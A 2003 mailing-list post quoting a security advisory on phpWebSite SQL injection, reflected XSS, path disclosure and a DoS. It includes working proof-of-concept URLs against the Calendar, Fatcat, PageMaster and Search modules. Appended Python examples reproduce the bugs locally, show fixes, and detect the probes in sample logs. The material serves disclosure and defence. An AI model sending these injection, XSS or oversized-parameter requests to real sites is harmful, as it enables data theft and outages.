From: seclists at violating.us (Jack Whitsitt (jofny))
Subject: phpWebSite SQL Injection & DoS & XSS Vulnerabilities

There is a fix for this available at phpWebSite's page (posted a short time
ago):
http://phpwebsite.appstate.edu/

-Jack Whitsitt


----- Original Message ----- 
From: "Lorenzo Hernandez Garcia-Hierro" <novappc@...appc.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Sunday, August 10, 2003 6:15 PM
Subject: [Full-Disclosure] phpWebSite SQL Injection & DoS & XSS
Vulnerabilities


>
> phpWebSite SQL Injection & DoS & XSS Vulnerabilities
> ------
> PRODUCT: phpWebSite
> VENDOR: Appalachian State University
> VULNERABLE VERSIONS:
>
>        - 0.9.x
>        - 0.8.x
>        - 0.7.x
>        - And older versions.
>
> NOT VULNERABLE VERSIONS
>
> - ?
> ---------------------
>
> Description:
>
> phpWebSite provides a complete web site content management system.
> Web-based administration allows for easy maintenance of interactive,
> community-driven web sites.
>
> ---------------------------------------------
> |SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
> ---------------------------------------------
>
> I encountered SQL Injection vulnerabilities in some of the phpWebSite
> modules, XSS (Cross Site Scripting), Path Disclosures and a Denial
> of Service attack.
>
> -------------
> | SQL       |
> | INJECTION |
> -------------
>
> I encountered SQL Injection vulnerabilities in the Calendar module,
> active in default configurations, that allow you to execute SQL queries
> on the target server with the privileges of the application user.
>
> When you send a specially crafted URL to the Calendar script you
> get an SQL error flag like this:
> __________________________________________________________________
> DB Error: syntax error
> select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED
> VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED
> VALUE]0110)) and active=1 [nativecode=1064
> ** You have an error in your SQL syntax near
> '\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or
> (endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1]
> ___________________________________________________________________
>
> This is an example error flag:
> ___________________________________________________________________
> DB Error: syntax error
> select * from mod_calendar_events where ((startDate >= 2003\0-10110 and
> startDate <= 2003\0-10110) or
> (endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1
> [nativecode=1064
> ** You have an error in your SQL syntax near
> '\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110
> and endDate ' at line 1]
> ___________________________________________________________________
>
> To get this you must use this simple URL:
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&year=2003%00-1&month=
>
> And you get the SQL error flag. The error occurs when the query
> includes the crafted value 2003[%00 = null]-1.
> You can design a successful query to get configuration values or
> authentication data.
> I designed a URL that makes a successful query (not a hostile query):
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%
> 20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%
> 29%20and%20active%3d1
>
> it is (without URL encoding):
>
> 2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <=
> 20071205)) and active=1
>
> A little knowledge of SQL (in this case, MySQL) is needed to make a
> successful attack.
>
> Other scripts of the Calendar module are affected by this hole: when
> you send a crafted request, like a + symbol as a critical URL variable
> value, you get the "pure" SQL server error flag, and you can imagine
> (I like this word) an SQL query to view private information of the
> application by looking at the error pages, like a trial-and-error
> method.
>
> Other URLs to probe are:
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&month=0&year=<
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&month=1%00&year=)SQL_INJECTION_FAKU
>
> ------------------
> | XSS            |
> | vulnerabilities|
> ------------------
>
> I encountered XSS security holes in some scripts of phpWebSite :
>
>
> http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]
> =day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]
>
> http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]
> =viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]
>
> http://[HOST]/[PATH]/index.php?
> module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]
> &MMN_position=[X:X]
>
> http://[HOST]/[PATH]/index.php?
> module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
>
>
> Note that the Calendar, PageMaster and Fatcat modules are affected
> COMPLETELY, and all the script variables that are passed by URL are
> affected too by this.
>
> When you access a hostile link with an XSS attack in those scripts your
> browser will execute the script commands.
> This can be used to steal cookies, authentication tokens and other
> private information.
> If your browser is vulnerable to other holes (like MSIE ;-) you can
> have more problems...
>
> XSS AT SQL ERRORS:
>
> If you send a crafted URL command with XSS attack code to some of the
> scripts that are vulnerable to SQL injection, the XSS attack code will
> be executed in the error page.
>
>
> -----------------
> | PATH          |
> |  DISCLOSURES  |
> -----------------
>
> I tested this on Win2K (Windows 2000 Professional) with SP3 and these
> versions:
>
> - Sambar Server 5.2 beta
> - PHP 4.2.3 running as ISAPI module
> - MySQL NT [normal service] 3.23.56
> - Include_Path to the pear folder of phpwebsite
>
> Sending this:
>
> http://127.0.0.1/index.php?module=calendar&calendar[view]
> =month&month=11&year=9 # You can try other things and get the same #
>
> you get this:
>
> Warning: localtime(): invalid local time in
> C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>
> Warning: localtime(): invalid local time in
> C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252
>
> <- more than fifty repetitions of this warning ->
>
> It is a strange error; I think that it only occurs in MS Windows
> installations.
> Possibly it occurs when the PEAR library TimeZone.php script tries to
> convert the local date to Unix timestamp format.
>
> ------------------
> | DENIAL OF      |
> |  SERVICE       |
> ------------------
>
> There is a DoS/Buffer Overflow attack in a script inside the Calendar
> module that allows you to crash the host running
> the MySQL server and the phpWebSite scripts (must be the same
> computer).
>
> This is a basic proof of concept for this vulnerability :
>
> http://[HOST]/[PATH]/index.php?index.php?module=calendar&calendar[view]=
> [VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )
>
> An attack like this causes a system global crash including the server
> service and the mysql service.
>
> -----------------
> |   SoLuTiOnS   |
> -----------------
>
> 1.- Be sure that the user of the phpWebSite database has only SELECT,
> INSERT and UPDATE privileges, and only on the phpWebSite
>     database.
>
> 2.- Use the PHP function eregi_replace to prevent XSS attacks.
>
> 3.- Turn php_error_flags to Off.
>
> 4.- In addition, if you are using Apache, use an external module like
> mod_security.
>
> 5.- If you are paranoid, don't use PHP, MySQL, Windows, Linux,
> computers, TCP/IP, NetBIOS, games, ASP,
>     Apache...... nothing!
>     WARNING ;-) : (paranoid solution...)
>
> -----------
> | CONTACT |
> -----------
>
> Lorenzo Hernandez Garcia-Hierro
> --- Computer Security Analyzer ---
> --Nova Projects Professional Coding--
> PGP: Keyfingerprint
> B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
> ID: 0x9C38E1D7
> **********************************
> www.novappc.com
> security.novappc.com
> www.lorenzohgh.com
> ______________________
>
> NSRG-20-7
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
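The Calendar injection described in the quoted advisory, as an added example that is not part of the original post or of phpWebSite's code: the query shape (table mod_calendar_events, columns startDate/endDate/active, the date spliced in four times) is taken from the quoted "DB Error" output, while the table contents, the 'title' column, the exact template, the payload, the year bounds and the use of Python's sqlite3 in place of MySQL are this example's own assumptions.

```python
"""Added example, not phpWebSite's code and not from the advisory above.

Rebuilds the Calendar query whose shape the advisory's "DB Error" output
reveals (table mod_calendar_events, columns startDate/endDate/active) and
shows why concatenating year/month/day into it is exploitable, then the
validated, parameterised version.  Everything else is constructed: the rows,
the 'title' column, the exact template, the payload, the year bounds, and
sqlite3 standing in for MySQL (the concatenation bug is the same in both).
"""
import re
import sqlite3

# Template reconstructed from the advisory's error page (assumption: the real
# code may differ in detail, but the date is visibly spliced in as text).
TEMPLATE = ("select title from mod_calendar_events where "
            "((startDate >= {d} and startDate <= {d}) or "
            "(endDate >= {d} and endDate <= {d})) and active=1")


def make_db():
    """Constructed sample data standing in for a phpWebSite install."""
    con = sqlite3.connect(":memory:")
    con.execute("create table mod_calendar_events "
                "(title text, startDate integer, endDate integer, active integer)")
    con.executemany("insert into mod_calendar_events values (?, ?, ?, ?)", [
        ("public meeting", 20031110, 20031110, 1),
        ("another public", 20031120, 20031120, 1),
        ("private 2007",   20071201, 20071201, 1),
        ("inactive 2003",  20031105, 20031105, 0),
    ])
    return con


def vulnerable_query(con, year, month, day):
    """The bug: year, month and day are written into the SQL text as given."""
    sql = TEMPLATE.format(d=year + month + day)
    return [row[0] for row in con.execute(sql)]


def error_for(con, year, month, day):
    """The error-page text an attacker sees when a probe breaks the SQL."""
    try:
        vulnerable_query(con, year, month, day)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


def parse_field(value, lo, hi):
    """Accept only a short run of ASCII digits within [lo, hi]; NUL bytes,
    SQL fragments and a 4000-byte value are all rejected before the DB."""
    if not re.fullmatch(r"[0-9]{1,4}", value):
        raise ValueError("non-numeric field: %r" % value[:20])
    number = int(value)
    if not lo <= number <= hi:
        raise ValueError("out of range: %d" % number)
    return number


def safe_query(con, year, month, day):
    """Fix: validated integers, bound as parameters instead of spliced as text."""
    y = parse_field(year, 1970, 2037)   # bounds are this example's choice
    m = parse_field(month, 1, 12)
    d = parse_field(day, 1, 31)
    date = y * 10000 + m * 100 + d
    sql = TEMPLATE.replace("{d}", "?")
    return [row[0] for row in con.execute(sql, (date, date, date, date))]


def is_rejected(con, year, month="11", day="10"):
    """True when safe_query refuses the input without running a query."""
    try:
        safe_query(con, year, month, day)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_query(con, "2003", "11", "10"))
    # Payload written for this template, in the spirit of the advisory's PoC:
    print(vulnerable_query(con, "2003) or 1=1 or (1", "11", "10"))
    print(error_for(con, ")", "01", "10"))
    print(safe_query(con, "2003", "11", "10"), is_rejected(con, "2003) or 1=1 or (1"))
```

The payload `2003) or 1=1 or (1` is built for this template: because the date appears four times, each splice has to leave the parentheses balanced, which is also why the advisory's own payload ends with `and active=1` and lets the original tail of the query glue onto it. The `)` probe reproduces the error-page leak; `parse_field` closes every reported variant at once (the `%00` value, the `+` probe, the `)SQL_INJECTION_FAKU` probe, the out-of-range `year=9`, and the multi-kilobyte DoS value).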

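The reflected XSS in the quoted advisory (a parameter such as `day=1+%00">...` echoed back into the page), as an added example that is not part of the original post or of phpWebSite: the parameter names come from the advisory's URLs; the HTML fragment, the hidden-field reflection, the concrete payload standing in for [XSS ATTACK CODE], and the parser-based check are constructed here.

```python
"""Added example, not phpWebSite's code and not from the advisory above.

Reproduces the reflected-XSS pattern the advisory reports, a URL value such
as day=1+%00">... echoed back into the page, in a tiny Python renderer, and
shows the escaped version next to it.  The HTML fragment, the hidden-field
reflection, the payload and the parser check are constructed here; only the
parameter names are taken from the advisory's URLs.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Query string from the advisory's calendar PoC with a concrete payload in
# place of [XSS ATTACK CODE]; the payload itself is this example's choice.
PAYLOAD_QUERY = ('module=calendar&calendar[view]=day&month=2&year=2003'
                 '&day=1+%00"><script>alert(1)</script>')


def params_from_query(query):
    """Decode the query string as a naive script would receive it: %00 turns
    into a real NUL byte and '+' into a space, neither of which is checked."""
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def render_vulnerable(params):
    """Every parameter is written straight back into hidden form fields, which
    is what lets a value such as 1 \\x00">... close the attribute and the tag."""
    fields = "".join('<input type="hidden" name="%s" value="%s">' % (k, v)
                     for k, v in params.items())
    return '<form action="index.php">%s<input type="submit"></form>' % fields


def render_fixed(params):
    """Same page, but NUL bytes are dropped and every reflected value is
    HTML-escaped with quotes encoded, so it stays inside the attribute."""
    def clean(s):
        return escape(s.replace("\x00", ""), quote=True)
    fields = "".join('<input type="hidden" name="%s" value="%s">'
                     % (clean(k), clean(v)) for k, v in params.items())
    return '<form action="index.php">%s<input type="submit"></form>' % fields


class PageCheck(HTMLParser):
    """Parses rendered HTML the way a browser would tokenise it and records
    the tags that appear plus the decoded value of each hidden field."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.hidden[a.get("name")] = a.get("value")


def check_page(html_text):
    """Feed a rendered page through PageCheck and return the filled parser."""
    parser = PageCheck()
    parser.feed(html_text)
    parser.close()
    return parser


if __name__ == "__main__":
    params = params_from_query(PAYLOAD_QUERY)
    print("vulnerable tags:", check_page(render_vulnerable(params)).tags)
    fixed = check_page(render_fixed(params))
    print("fixed tags:", fixed.tags, "day =", repr(fixed.hidden["day"]))
```

The check is deliberately a parser rather than a substring match: the vulnerable page yields a real `script` element, while the fixed page yields none yet still carries the attacker's text as inert attribute data, which is the property an output-encoding fix has to preserve. The same `clean()` treatment applies to the "XSS at SQL errors" case, where the raw query is echoed into the error page.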

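Detection for the probes the quoted advisory lists, as an added example that is not part of the original post or of phpWebSite: it runs over constructed Apache access-log lines whose IPs, timestamps, response sizes and /phpws/ path are made up, with the advisory's PoC query strings reused and [XSS ATTACK CODE] and the 4000-byte DoS value filled in by this example. The numeric-parameter list and the thresholds are this example's choices.

```python
"""Added example, not part of the advisory or of phpWebSite.

A small detector for the request patterns the advisory describes, run over
constructed Apache access-log lines (IPs, timestamps, sizes and the /phpws/
path are made up; the query strings follow the advisory's PoC URLs with
[XSS ATTACK CODE] and the 4000-byte DoS value filled in by this example).
It flags a NUL byte (%00) in any parameter, attribute/tag breakout
characters, SQL keywords or parentheses in parameters that should be
numeric, and an over-long query string.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
# Parameters that must be plain integers in the modules the advisory names
# (calendar, fatcat, pagemaster, search); the list is this example's choice.
NUMERIC = {"year", "month", "day", "fatcat_id", "PAGE_id", "PDA_limit"}
SQL_SYNTAX = re.compile(r"\b(?:and|or|select|union|where)\b|[()]", re.I)
BREAKOUT = re.compile(r"""["']|</?[A-Za-z]""")   # quote, or start/end of a tag
MAX_QUERY = 4000   # the advisory's DoS PoC sends more than 4000 bytes


def classify_request(path):
    """Return the list of reasons a request path looks like one of the probes."""
    reasons = []
    query = urlsplit(path).query
    if len(query) > MAX_QUERY:
        reasons.append("oversized-query")
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if value == "":
                continue
            if "\x00" in value:
                reasons.append("nul-byte:" + name)
            if BREAKOUT.search(value):
                reasons.append("html-breakout:" + name)
            if name in NUMERIC:
                if SQL_SYNTAX.search(value):
                    reasons.append("sql-syntax:" + name)
                if not re.fullmatch(r"[0-9]{1,8}", value):
                    reasons.append("non-numeric:" + name)
    return reasons


def scan(log_text):
    """Return (line number, reasons) for each log line that triggers a reason."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = LOG_RE.search(line)
        if match:
            reasons = classify_request(match.group("path"))
            if reasons:
                hits.append((lineno, reasons))
    return hits


LONG_YEAR = "+".join(str(n) for n in range(91, 1200))   # "91+92+93+..." past 4000 bytes
# Constructed sample log: one benign request, then the advisory's four probes.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [10/Aug/2003:18:15:01 +0200] "GET /phpws/index.php?module=calendar&calendar[view]=day&month=11&year=2003&day=10 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [10/Aug/2003:18:15:07 +0200] "GET /phpws/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= HTTP/1.1" 200 812',
    '10.0.0.9 - - [10/Aug/2003:18:15:12 +0200] "GET /phpws/index.php?module=calendar&calendar[view]=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%29%20and%20active%3d1 HTTP/1.1" 200 9004',
    '10.0.0.9 - - [10/Aug/2003:18:15:20 +0200] "GET /phpws/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3310',
    '10.0.0.9 - - [10/Aug/2003:18:15:31 +0200] "GET /phpws/index.php?module=calendar&calendar[view]=month&month=11&year=' + LONG_YEAR + ' HTTP/1.1" 500 0',
])

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(lineno, ", ".join(reasons))
```

The checks are applied to the decoded value, so `%00`, `%22%3E` and `+` are caught however the client encoded them, and SQL keywords are only flagged in parameters that should be numeric, so a legitimate search for "salt and pepper" does not trip the rule. A 500 response on an oversized query, as in the last sample line, is the signature of the advisory's DoS.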